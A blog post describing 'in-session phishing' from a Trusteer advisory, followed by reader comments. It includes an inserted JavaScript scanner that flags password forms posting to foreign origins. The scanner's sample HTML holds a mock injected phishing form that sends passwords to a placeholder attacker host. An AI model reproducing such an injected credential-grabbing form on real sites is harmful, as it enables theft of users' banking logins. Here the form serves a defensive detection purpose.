New bug found in Browsers – Birth of In-session Phishing

Bug found in all the Major Browsers!

A new kind of vulnerability has been found in all the major browsers which makes it easier for criminals to steal online banking credentials using a new form of phishing called ‘In-Session Phishing’.

According to an advisory issued by Trusteer, an enterprise and consumer desktop security company, this type of attack seems more believable because of a bug found in the JavaScript engines of all the most widely used browsers.

What is In-Session Phishing?

It’s a sophisticated and highly effective phishing technique that is carried out while a user has an active session with a secure banking, brokerage or other sensitive web application.

How does it work?

The bad guys (attackers) hack a legitimate web site and insert HTML code that looks like a pop-up security alert. The pop-up then asks the victim to enter their password and login information, and possibly to answer the other security questions that banks use to verify the identity of their customers.
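The injected pop-up has to send whatever the victim types somewhere the attacker controls, so a password field inside a form that submits to a foreign origin is a strong signal that a page has been tampered with. The following is an added example, not code from the original post or from Trusteer: a small defender-side scanner that walks served HTML and flags password forms whose action points away from the page’s own origin. The page URL, the HTML and the domain names in it are constructed for the example (the attacker domain uses the reserved `.invalid` TLD), and the tag scanning is a deliberately simple regex pass rather than a full HTML parser.

```javascript
// Added example (not from the Trusteer advisory or the original post).
// Heuristic: a <form> containing <input type="password"> whose action
// resolves to an origin other than the page's own is flagged. Injected
// "security alert" pop-ups used in in-session phishing must post the
// captured password to an attacker-controlled host, so this catches the
// common case; a real scanner would use a proper HTML parser.

const FORM_RE = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

// Parse one tag's attribute text into a lowercase-keyed object.
function parseAttrs(attrText) {
  const attrs = {};
  let m;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Does this form body contain an <input type="password">?
function hasPasswordInput(body) {
  const inputRe = /<input\b([^>]*)>/gi;
  let m;
  while ((m = inputRe.exec(body)) !== null) {
    const attrs = parseAttrs(m[1]);
    if ((attrs.type || '').toLowerCase() === 'password') return true;
  }
  return false;
}

// Resolve a form action against the page URL and return its origin.
// A missing or relative action submits to the page's own origin.
function actionOrigin(action, pageUrl) {
  try {
    return new URL(action || '', pageUrl).origin;
  } catch {
    return null; // unparsable action: unknown target
  }
}

// Return every password form whose submit target is not the page's own
// origin. pageUrl is the URL the HTML was served from.
function findSuspiciousForms(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  let m;
  while ((m = FORM_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    if (!hasPasswordInput(m[2])) continue;
    const target = actionOrigin(attrs.action, pageUrl);
    if (target !== pageOrigin) {
      findings.push({ action: attrs.action || '', targetOrigin: target });
    }
  }
  return findings;
}

// Constructed sample page: the bank's real login form, an injected fake
// "security alert" form posting to an attacker host, and a harmless
// search form with no password field. All names are placeholders.
const SAMPLE_PAGE_URL = 'https://bank.example/account';
const SAMPLE_HTML = `
<form action="/login" method="post">
  <input name="user"><input type="password" name="pass">
</form>
<div class="alert">Security alert: please re-enter your password
<form action="https://collector.phish.invalid/grab" method="post">
  <input type="text" name="u"><input type='password' name='p'>
</form></div>
<form action="https://bank.example/search"><input name="q"></form>
`;

// Expected: one finding, targetOrigin "https://collector.phish.invalid"
console.log(findSuspiciousForms(SAMPLE_HTML, SAMPLE_PAGE_URL));
```

Run it with Node; only the injected form is reported, because the real login form resolves to the page’s own origin and the search form carries no password field. The same check is cheap enough to run as a post-deploy integrity test against a site’s own pages, which is where a compromised legitimate site, the starting point of this attack, would be noticed.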

More on In Session Phishing Attack (PDF) from Trusteer.

How is it different from traditional Phishing?

In a traditional Phishing attack, the attackers send out millions of e-mail messages disguised to look like they come from a legitimate source, such as banks or financial institutions.

These messages are often blocked by spam filtering software. With in-session phishing, the e-mail message is replaced by a pop-up browser window.

Measures being taken

By studying the way browsers use JavaScript, the team at Trusteer found a way to identify, by means of a JavaScript function, whether or not someone is logged into a web site. All the browser makers have been informed, and one can expect the bug will eventually be patched by them.

Until then, criminals who discover the flaw could write code that checks whether Web surfers are logged into, for example, a predetermined list of 100 banking sites. “Instead of just popping up this random phishing message, an attacker can get more sophisticated by probing and finding out whether the user is currently logged into one of 100 financial institution Web sites

Conclusion

Yet another browser vulnerability. A few weeks ago Microsoft asked its users to update their browser with a patch for a security vulnerability. Software product makers will always have their hands full, as they have long-term clients in the form of hackers!


Comments

@Arun, you are right. Software product giants have their regular clients :) It is always good that we be vigilant and don’t enter the password when we get a popup window to enter it. Always enter the password from the regular login window.

Nihar’s last blog post: Download Free Windows 7 Themes, Wallpapers, Gadgets

It’s too challenging for the companies and users also. Whatever safety measures you take, these bad guys don’t stop trying to enter into your life :)

TechZoomIn’s last blog post: WDW Adsense Plugin: Complete Adsense Solutions

@Nihar, yes. You are correct. My awareness of these issues has increased. I’m very cautious.

@TechZoomin, being cautious is the only solution. Of course, being suspicious also helps!

The worrying thing is that banks do produce popup login screens. How hard would it be for phishers to duplicate these to make them look authentic?

Sueblimely’s last blog post: Blogging Christmas Challenge

@Sueblimely, it may not be that difficult for the bad guys to duplicate the pop-ups. Instead, the difficulty lies with the banks in ensuring they serve authentic pop-ups to their users!

That’s great! Your post is very nice and informative. You have helped me to improve my poor knowledge about In-Session Phishing. Many thanks for your share.

Sean’s last blog post: Spotted a Trend

Wow, it’s really a very good idea to patch up your browsers so you can be sure your web money is secured; you won’t know it unless your money has been withdrawn by other people you don’t know…

Ah, I’ve never heard about this until now, and I usually use the internet every day. Things like this scare me. I would probably fall for a trick like this if I wasn’t paying attention to what I was doing. Thanks for sharing this information.

Never trust any email that says your PayPal cash has been withdrawn last blah blah blah and gives you a link to PayPal to login. It is 100% a phishing site, so to make sure, open a separate window and type the PayPal address yourself, then login to see if your balance really changed.

Hmm. Aside from the essentials (good antivirus, antispyware, firewall and all available OS updates) it seems like user knowledge is required to spot these new vulnerabilities. How do you teach someone to spot the difference between a real prompt and a phishing attempt?

Peter’s last blog post: Prevent Virus Infection
